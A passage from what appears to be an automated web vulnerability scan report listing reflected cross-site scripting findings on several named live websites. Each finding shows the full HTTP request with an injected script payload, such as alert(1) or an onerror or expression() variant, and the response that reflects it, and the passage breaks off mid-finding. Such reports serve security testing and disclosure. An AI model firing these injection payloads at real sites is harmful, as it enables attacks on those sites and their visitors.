User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:55 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5122

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/togaf977a7d"><script>alert(1)</script>5d373802e00/cert/">
...[SNIP]...

3.178. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:00 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5125

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togaf99edeb--><script>alert(1)</script>120de7a4391/cert/ -->
...[SNIP]...

3.179. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:51:57 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5113

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf94fa9b<script>alert(1)</script>23835d6a4f/cert/<br>
...[SNIP]...

3.180. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:18 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5125

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<!-- re_url = /togaf9/certa8972--><script>alert(1)</script>2670c9f9ea1/ -->
...[SNIP]...

3.181. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:09 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5122

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<input type=hidden name=lost value="/togaf9/cert296c2"><script>alert(1)</script>a8f2df5e418/">
...[SNIP]...

3.182. http://www.opengroup.org/togaf9/cert/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opengroup.org
Path:   /togaf9/cert/

Request

GET /togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/ HTTP/1.1
Host: www.opengroup.org
Proxy-Connection: keep-alive
Referer: http://www.opengroup.org/togaf/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=30649185.1298915328.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=TOGAF; __utma=30649185.357493113.1298915328.1298915328.1298915328.1; __utmc=30649185; __utmb=30649185.1.10.1298915328

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 17:52:15 GMT
Server: Apache/1.3.37 (Unix) PHP/4.4.4
Content-Type: text/html
Content-Length: 5116

<html>
<head>
<title>Not found</title>
<link rel="stylesheet" href="https://www.opengroup.org/stylesheets/info1.css">
</head>
<link href="/stylesheets2/opengroup.css" rel="stylesheet" type="text/css">
...[SNIP]...
<br>
http://www.opengroup.org/togaf9/certe1cf2<script>alert(1)</script>e0cfa26c479/<br>
...[SNIP]...

3.183. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [bean parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperthin.com
Path:   /_cs_apps/ajaxProxy.cfm

Request

GET /_cs_apps/ajaxProxy.cfm?bean=twitterService7e534<img%20src%3da%20onerror%3dalert(1)>39d24d73cff&method=buildUtilityTweetHTML&searchString=commonspot HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.3.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:16:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Pragma: no-cache
Expires: {ts '2011-02-26 18:16:29'}
Content-Type: text/html; charset=UTF-8
Content-Length: 1638


           <script type="text/javascript" src="/ADF/thirdParty/jquery/jquery-1.3.2.js"></script>
           
           
   <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} -->
   <script type='text/javascript' s
...[SNIP]...
</script>
   The Bean: twitterService7e534<img src=a onerror=alert(1)>39d24d73cff with method: buildUtilityTweetHTML is not accessible remotely via Ajax Proxy.

3.184. http://www.paperthin.com/_cs_apps/ajaxProxy.cfm [method parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperthin.com
Path:   /_cs_apps/ajaxProxy.cfm

Request

GET /_cs_apps/ajaxProxy.cfm?bean=twitterService&method=buildUtilityTweetHTML998c7<img%20src%3da%20onerror%3dalert(1)>36e6591e379&searchString=commonspot HTTP/1.1
Host: www.paperthin.com
Proxy-Connection: keep-alive
Referer: http://www.paperthin.com/products/pricing-options.cfm
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379.1298762761.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); sifrFetch=true; MTCCK=1; __utma=259978379.1159283661.1298762761.1298762761.1298762761.1; __utmc=259978379; __utmb=259978379.3.10.1298762761

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:16:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13
Pragma: no-cache
Expires: {ts '2011-02-26 18:16:36'}
Content-Type: text/html; charset=UTF-8
Content-Length: 1638


           <script type="text/javascript" src="/ADF/thirdParty/jquery/jquery-1.3.2.js"></script>
           
           
   <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} -->
   <script type='text/javascript' s
...[SNIP]...
</script>
   The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1)>36e6591e379 is not accessible remotely via Ajax Proxy.

3.185. http://www.prchecker.info/check_page_rank.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Request

GET /check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae?action=docheck&urlo=http%3A%2F%2Fcloudscan.us&submit=Check+PR HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php
Cache-Control: max-age=0
Origin: http://www.prchecker.info
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...
<form action="/check_page_rank.php/27f50"><script>alert(1)</script>1c5367c1276627aae" method="post">
...[SNIP]...

3.186. http://www.prchecker.info/check_page_rank.php [urlo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prchecker.info
Path:   /check_page_rank.php

Request

GET /check_page_rank.php?action=docheck&urlo=http%3A%2F%2Fcloudscan.us82917"%20style%3dx%3aexpression(alert(1))%20363f71d7529b64269&submit=Check+PR HTTP/1.1
Host: www.prchecker.info
Proxy-Connection: keep-alive
Referer: http://www.prchecker.info/check_page_rank.php
Cache-Control: max-age=0
Origin: http://www.prchecker.info
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=d8830cccd52d81fdcc1aa4a449836fbd

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:34:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<html>    
   <title>
...[SNIP]...
<input type="text" value="http://cloudscan.us82917\" style=x:expression(alert(1)) 363f71d7529b64269" name="urlo" maxlength="200" class="McheckUrl MCmain">
...[SNIP]...

3.187. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:55 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14545

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
s.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='24c8e9b</script><script>alert(1)</script>a1374672bac';
</script>
...[SNIP]...

3.188. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-25/page-1/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Portfolio/Trades-and-Exhibits/id-2598f92%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4b72cc82878/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:02 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14545

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
s.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='2598f92</script><script>alert(1)</script>4b72cc82878';
</script>
...[SNIP]...

3.189. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-7/page-1/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /Portfolio/Trades-and-Exhibits/id-74e625%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7ccd8e3bb1d/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:51 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14544

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
cs.com/admin/imageproject/22940b.jpg';

           portfolio25[1][1]='Awards Logo design';

           portfolio25[1][2]='22940b.jpg';

           portfolio25[1][3]='229';

           portfolio25[1][4]='25';

           
var CurrentPageId='74e625</script><script>alert(1)</script>7ccd8e3bb1d';
</script>
...[SNIP]...

3.190. http://www.virtusa.com/applications/userlogin/userlogin.asp [fn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /applications/userlogin/userlogin.asp

Request

GET /applications/userlogin/userlogin.asp?fn=practicebrochure/DWBIPR-PB-0410.pdfc59a7"><script>alert(1)</script>562a4528863&iframe HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2672
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="
...[SNIP]...
<input type="hidden" name="fn" id="fn" value="practicebrochure/DWBIPR-PB-0410.pdfc59a7"><script>alert(1)</script>562a4528863" />
...[SNIP]...

3.191. http://www.virtusa.com/common/exitpage.asp [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.virtusa.com
Path:   /common/exitpage.asp

Request

GET /common/exitpage.asp?msgid=2&page=http%3A%2F%2Fwww%2Egartner%2Ecom%2Ftechnology%2Fsummits%2Femea%2Fbusiness%2Dprocess%2Findex%2Ejsp5b063"><script>alert(1)</script>97885e32c80 HTTP/1.1
Host: www.virtusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=213023891.1298986816.1.1.utmccn=(organic)|utmcsr=google|utmctr=Virtusa|utmcmd=organic; virtusa=csession=650730749&tid=2324094; __utma=213023891.1848117310.1298986816.1298986816.1298986816.1; __utmc=213023891; __utmb=213023891; ASPSESSIONIDCARSSRAC=JAMFJMGCCILFNOJAPOIFKBLI;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2085
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 17:02:11 GMT
Connection: close


<style>
body{
   padding:0;
   margin:0;
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333;
}
   
#contentarea{
   display:block;
   padding-top:10px;
}

#tbl{
   display
...[SNIP]...
<a href="http://www.gartner.com/technology/summits/emea/business-process/index.jsp5b063"><script>alert(1)</script>97885e32c80" target="_blank" onclick="$.fn.fancybox.close()">
...[SNIP]...

3.192. http://www.watchmouse.com/assets/css/print.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/print.css

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/css/print.css291e9'-alert(1)-'67bdd5c1b7a?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:31 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-23e31667bc72ad97513a3b9a533cce89"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::print.css291e9'-alert(1)-'67bdd5c1b7a?20101008');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
   
...[SNIP]...

3.193. http://www.watchmouse.com/assets/css/screen.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /assets/css/screen.css

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /assets/css/screen.css8adcd'-alert(1)-'6e92d57bec8?20101008 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sun, 27 Feb 2011 01:37:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-b162fa23d063abe27d39c6c2ca59435b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.watchmouse.com/en/::screen.css8adcd'-alert(1)-'6e92d57bec8?20101008');
           var serverRef = encodeURIComponent('http://www.watchmouse.com/en/');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
   
...[SNIP]...

3.194. http://www.watchmouse.com/en/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en3c623'-alert(1)-'83954da49c1/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
